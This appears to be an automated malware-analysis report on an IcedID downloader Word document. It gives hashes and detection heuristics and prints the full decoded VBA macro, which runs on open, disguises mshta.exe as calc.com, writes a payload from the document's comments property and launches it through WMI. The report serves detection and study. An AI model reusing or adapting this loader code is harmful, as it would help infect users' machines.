Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1182327c91603f7e…

MALICIOUS

Office (OOXML)

79.3 KB Created: 2020-12-01 11:02:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-12-25
MD5: e276a418c09394ddbaf7c937c9b4ea60 SHA-1: 947509347ff99f8e7d01bb5c1b9b8350c636120d SHA-256: 1182327c91603f7ea8f556b0d5f4ef08058fe6357605682afb13f3b64d69757e
170 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(awY6r).create (aWjxv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13623 bytes
SHA-256: 7a75f5b939272a657a34eea1f355c69489e8e40ab6d93303fcd660c9a2133d27
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "a7T4uP"
Function ati159(afijMF)
' Disorganized sonya deep
aHc0j = afijMF
aB6lx9 = Len(aHc0j)
For at4UZ0 = 0 To aB6lx9 - 1
' Baboon steel diagonal
' Metamorphosis lanes legislature acclaim
' Unbidden spam
' Predicate aspen blues
' Skilled
' Semester funds karl add probabilities
' Dyspepsia fauna swing appears
' Presumptuous wholl features preoccupied sulphuric
' Insipid surmount horror
' Blizzard ri mess candidly illiberal
' Oem
' Mortgage mirthful suggesting highlight instigator encoding
' Generous reporting
' Oven create
' Marshall somehow cringe rp
' Bunk lovely
' Competitor replacing all-round elegy
' Mushroom dist afire virility invitation
' Impaled infatuation hydra
' Addiction auckland
' Incompatible john
' Wants
' Teamster revealed artwork matches love-making
' Unholy textiles obtained
' Loudness humped
' Quartette clips
' Floral patio
' Prep unpacked
' Food cheats
' Pincers amphibious tar third
' Elfin
' Ot offshoot pc
' Float
aBVEGb = aBVEGb & Mid(aHc0j, (aB6lx9 - at4UZ0), 1)
Next at4UZ0
' Mar alkali chimera
' Dating glimmered calvary function
' Density anachronism peremptory
' Succor mop sword dolls
' Manor chic emaciated
' Fatherly stagnant kilt gable
' Usurper froze
' Coupons overdo rudiments
' Worst
' Scrip series
ati159 = aBVEGb
End Function
Public Function admq0V(axiKs)
admq0V = Replace(axiKs, aso8D, "")
End Function
Sub AutoOpen()
' Symmetry blink facing visit sharon
aGis3U
End Sub

Attribute VB_Name = "area1I"
Public Const aHVzE2 As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aso8D As String = ")"
Public Const auQG07 As Integer = -2440 + 2453
Function apdSL6()
' Clinton inconsolable sphere
' Draws ind. unix forsworn lips
' Lighter fallacy
' Democrats potentate distribute baggy progressive earn
' Nasal forces arab
' Functional historically involving mosque
' Propulsion warehouse combining apulia
' Wriggle jvc fitness gretchen papua
' Sitemap abstained
' Architect poll distinction ic pty
' Freeze angola sticky episcopal intermission
' Trivia octagonal chem dent bloody burthen proboscis
End Function
Sub aG1tsp(a0qxmr)
' Accommodate connectivity hundredth
' Britannia
' Assets freeze us taxi
' Liege pedagogue
' Tiptoe exemplify
' Astronomer spurious injured
' Com- wanda willow
' Pave loads
' Said rhea exams substantially
' Aristocrat translate rats ccd languorous winds outer
' Doze substitute
' Lion cohen cables
' Hazardous requests susan
End Sub
Function adIae(aMfup)
' Fashion poland samaria burlesque coerce
adIae = ActiveDocument.BuiltInDocumentProperties(aMfup)
End Function
Public Sub aJGw3()
If 354 - 290 < 129 Then
Call aYoDX
End If
End Sub
Public Sub a6B0P()
' Broadcasting backgrounds pod
' Border
' Sucking approving measurements unbelievable
' Pet readings
' Furze utilization
' Eleven info
' Interpose enervated
' Nonprofit
' Blond metric unknown detraction guido
' Trademarks turnkey
' Adams psyche
If 354 - 290 < 129 Then
Call alQ8C
End If
End Sub

Attribute VB_Name = "aqxCk"
Public Function amB0qZ(acFCs, aNX9jY)
' Enhance bulgarian
' Grande beverly
' Practitioners ceiling appealingly triangle palmer removal
' Booth under feign
' Bankrupt brawl rg manhattan latinas
' Ailed placing
' Dastardly trapping follower woodlands meetings
' Jewel return injection
' Instantly ova incompetent
' Wilkinson terrorism
' Stew artifice wa influx
' Ripen
' Winded
' Dont demise
' Fend greenwich sepulchre
' Disastrously
' Logos packard vitamin instantaneously
' Increase hunt
' Funky ecuador
' Arrived ep mecca rotating gibraltar temperature
' Rubble posted scandinavia dimension variants enormous
' Legendary procures cookies
' Cracking superman blue-black vicissitude hans memento
' Hypocritical adopt bounteous chad
FileNumber = FreeFile
Open acFCs For Output As #FileNumber
' Downpour tag ointment truncheon
' Partaken upturned halloween backwoods
' Restrict sewing dealer
' Thorny control trousseau bog contributed
' Triple marbles throb sculpture facilitating hard-boiled
' Silk seam acidity claudia fraudulent keyboard
' Anterior ignition kathleen
' Biggest consecrate criticized
' Perverted tools shrewdly
' Bermuda
' Sense truck domains patches
' Ner artemis collapse flagship
Print #FileNumber, aNX9jY
Close #FileNumber
End Function
Sub aClJqU(aglIMk, aaAyRK)
' Abduction implementing abnegation fairy hamilton thieving
' Yarn perception noose
' Providence
' Hives undesirable intuitive aura
' Tenaciously arabic
' Steam gen
' Loon scanner accumulates handjobs
' Crate guidelines mesa engineers
' Accessory conscripts
' Mayor
' Deaths handhelds
' Plaintiff insufferable amazon thirty-one
' Vomiting mit
' Spruce fahrenheit mexico
' Observable lattice del fi
' Grave
' Palette dts jets dissimilar
' Tutorial
' Solo fauna
' Rend southeast easier dealt
' Mead imposed pegasus slighting
' Tablespoon greece textbooks financial raspberry
' Shopping obsequious voltaic
FileCopy aglIMk, aaAyRK
End Sub
Function abH61(aVUmen)
' Mom retribution treatment
' Technician embedded corks
' Antivirus abstractedly plumage thumping
' Clipped giants
' Naked jpg twenty-seven
' Titled Word products
' Puts substitute undoing sponsor expiate
' Alien assignments bye
' Lazarus
' Mono ethnic omniscient shows
abH61 = aVUmen
End Function

Attribute VB_Name = "aHJ6up"
Sub aGis3U()
' Catalogs elemental where
' Sis no subjunctive inexpensive heritage
' Lurked signup
' Hearsay exasperate
' Amongst knee-deep
' Calgary swoon
' 411 beam bush champions
' Lighthouse culinary therapeutic
' Procreation scientific noted alienation mat
' Stealthy burgher parry immune
aJGw3
' Ruts muscles precipitated contemn trip edwards pierce
' Characterization buf beneath
' Captious compact white
' Sulkily carboniferous turned baffle
' Waft
' Declaration failures whosoever playlist clean immutable
' Container materials promises
' Thrive draper altering
' Problems cups
' Curve erp europe tune
' Weblogs philosophy extensions
' Distraction obituaries
a6B0P
' Slough simplified emily
' Anger ar caucasian
' Tamper sarah maintaining generate storey
' Washington jude terrace weapon reconstruct
' Person overbearing footwear
' Ks withering previews antidote keith active
' Talmud debtor narcissus
' Edict
' Such ugly morale anything sg
' Minx circlet
' Eight inanimate
' Categories nudist winters
' Aberrations abstract
' Realize
' Linda locomotion
' Hugh brocade diverge
' Subcommittee
' Expectations wagon pantheism
' Receive chevalier
' Southwest boatswain eighty-two
' Wherewithal heights tune eliminate
' Unblemished footfall where
' Downhill
' Electronic disembodied
' Persistent
' Nether ratification
' Credulous asian typewritten delete
' Unpremeditated unicameral cinder casual funnel bloodshot
' Trio immune dash
' Examines fence
' Concupiscence flat
' Sector reply shaved
' Amanda angelic
' Andover sessions sensuous small
' Dogma mace lige tendril conversion
' Frankfurt two mustang
' Static county contains
' Creativity blackbird clarity interior
' Betting galen tuft
' Tryst parameter arroyo zodiac compared
' Whitewash hopes halter
' Dancing interventions horror
' Shareware countries catering covert
' Gear blurred actions lustrous
' Thunderstorm crash pate untold
' Ufo packet
' Randy meteoric closure
' Stickers carinthia miocene
' Antiquated runner ft largesse
' Betide championship broadcast eyed value
' Creations atlanta
' Worn-out calculation burlington detest dies
' Crane buoyancy advertisement
' Stay granted arena vision
' Evil sociology library morass
awY6r = admq0V(ati159(aHVzE2))
' Willow scores sleeping
CreateObject(awY6r).create (aWjxv)
End Sub

Attribute VB_Name = "awAdY3"
Function aBt82()
aBt82 = VBA.Split(ati159("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function aoiuE(axuFCO)
aHoY8 = aBt82()
' Botany robert
' Discourage keel adjournment lived surrey purblind
' Hardcover
' Mortgages
' Inhospitable
' Warranties limitation profusely functioning
' Workshop mv
' Mislaid
' Flooring consensus potter harold
' Logs guatemala
' Briefs garish guaranteed
' Villainous surmount finances
' Paxil seating freak penitentiary
Select Case axuFCO
' Foundations
' Nave treated trend
' Pmid epidermis accrued
' Destroy uncompromising earshot measurement drum
' Presbytery problematical anachronism suggestions
' Refined null upc ra penmanship cravat breed
' Enable surge story
' Measurement emit gill refrigerator grain
' Joker persistent slav debility byte
' Uncompromising canna
' Coalition infirmity weapon
Case 0:
aoiuE = aHoY8(1)
' Gruesome
Case 1:
' Antarctic intolerant
' Selecting footnote weapon
' Dale jobs prescribed hrs
' Blogging blonde suggestions stuttgart
' Terminating claire siddhartha
' Evoke alex huntington identified
' Undercurrent misuse solely
' Horny antigua treating
' Scabbard nazarene
' Comfort scudding dissolute
' Finest dogma believe
aoiuE = aHoY8(2)
Case 2:
aoiuE = aHoY8(3)
End Select
End Function
Sub alQ8C()
aJscX = a7PjYe(aoiuE(2))
amB0qZ aJscX, anD3Wb(adIae("comments"))
End Sub

Attribute VB_Name = "a9No0"
Function aMuJH(al23a)
' Aeschylus imagery madder
' Celebrity spike
' Cram gauntlet endearment locusts oneness
' Bidding poems measures
' Tick recurrence
' Broadsword stoical amorphous suggestions jess
' Styles indicated momentarily assessed airlines
' Synod cia
' Acumen matters
' Una shelf bradley
' Happen donald unitarian melbourne hoped
aMuJH = admq0V(al23a)
End Function
Function awrPp(alBUu)
' Tables structures num
awrPp = (admq0V(alBUu))
End Function
Function a7PjYe(axO9p)
' Cornfield leo
' Eligibility overnight marshy
' Dairy dependence jetty
' Secede heinous
' Soot thankfulness twos profitless
' Newcastle supervisor acts
' Levee s bloodshot sold pertinent
' Kidney accomplishes portsmouth godmother
' Rentals types janet fewest singularity ovum
' Spaces relation pda
' Olympic wills scold
a7PjYe = (admq0V(axO9p))
End Function
Function aWjxv()
acOfFG = awrPp(aoiuE(1))
acSO8 = a7PjYe(aoiuE(2))
aWjxv = acOfFG & " " & acSO8
End Function
Sub aYoDX()
a3BVft = aMuJH(aoiuE(0))
acOfFG = awrPp(aoiuE(1))
aClJqU a3BVft, acOfFG
End Sub
Function aYj8w(a0G1K)
aYj8w = a0G1K + 30394 / 1169
End Function
Function arCWmU(aG98oQ)
If aG98oQ = 0 Then
arCWmU = -16021 + 16022
' Href librarian tex session
' Handjob sapphire
' Tide jeweler disconcerting proposition
' Walt posting scythe pill ennui
' Baseness communal evolve
' Bd pollution transparent hip
' Signing retains seaport
' Brothers asthma
' Adopt regardless distilled
' Puzzle ignore ion fire louisville
' Flickered boy
' Scarecrow samoa studies erotica harley
' Aggressor glassy rarity swift fifty-eight
' Trice
' Miles internationally freckled advertisements
' Ravenously confident translation hundredweight
' Incendiary longevity
' Endless matrimony
' Ell ipod scraggy ode
' Ave rancid
' Calabria ringleader perforated prop meets liver
' February sculpture
' Unknown structural inca
ElseIf aG98oQ = 5 Then
arCWmU = 26093 / 269
Else
arCWmU = 5120 / 5
End If
End Function
Function ax87U(a0G1K, aDtASk)
ax87U = a0G1K - aDtASk
End Function
Function aniW5(a0G1K)
aniW5 = Chr(a0G1K)
End Function

Attribute VB_Name = "aOqZSc"
Function anD3Wb(aA8po) As String
Dim aQLzd As Long
Dim a8BS3 As Integer
Dim aYNnt As Integer
For aQLzd = 1 To VBA.Len(aA8po) Step 1
aYNnt = 0
alvAfL = Mid(aA8po, aQLzd, 1)
' Requisition itch alerts lack pliable
a8BS3 = Asc(alvAfL)
' Offering stack jeweler
' Ventures kick
' Requests halter deal betaken
' Precipitately meed currently
' Kent commitment rectum
' Exploring fa inquiry
' Converted dt group
' Lancashire hurling j
' Shanty ltd longest
' Somehow nutriment regions
' Budget textiles empty amelioration capitol
' Surmised profligate curve pussy era grill sapling
' Shunned detrimental elope
' Tatiana inquisitor namibia ceres preference
If (a8BS3 > 64 And a8BS3 < 91) Or (a8BS3 > 96 And a8BS3 < 123) Then
aYNnt = auQG07
a8BS3 = ax87U(a8BS3, aYNnt)
' Astronomer ballot threadbare
' Experimentally dictator drainage dreamer
' Aquila nurse
' Bale turned avon ir experts
' Watching hemlock luster ostentatious pt. competition
' Sedate julian
' Dts georgie risky aboriginal
' Insidiously gibson bluish mae refectory three-cornered
' Thicken expanded passer-by gasoline
' Jt
' Quarters vertical susanna done
If a8BS3 < arCWmU(5) And a8BS3 > 83 Then
a8BS3 = aYj8w(a8BS3)
ElseIf a8BS3 < -260 + 325 Then
a8BS3 = aYj8w(a8BS3)
End If
End If
aTBUeX = aniW5(a8BS3)
' Sh fundraising tatters dray intelligent thane
Mid$(aA8po, aQLzd, 1) = abH61(aTBUeX)
Next
' Forensic nasdaq nm
' Namespace applies obituaries strew
' Accreditation downtown
' Sorcery cold-blooded toothache step
' Imagery ought string
' Spittle inaugurate syndication
' Better wield wheel gallic
' Submissions libertine uv
' Charles episode aunty reviews
' Fatherhood nurture menagerie
anD3Wb = aA8po
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 54784 bytes
SHA-256: a6ae4674ed4806c207f1468431bb9be4d5153fbefced29ab9290556a101e0232

Open this report in the interactive analyzer, or submit your own file for analysis.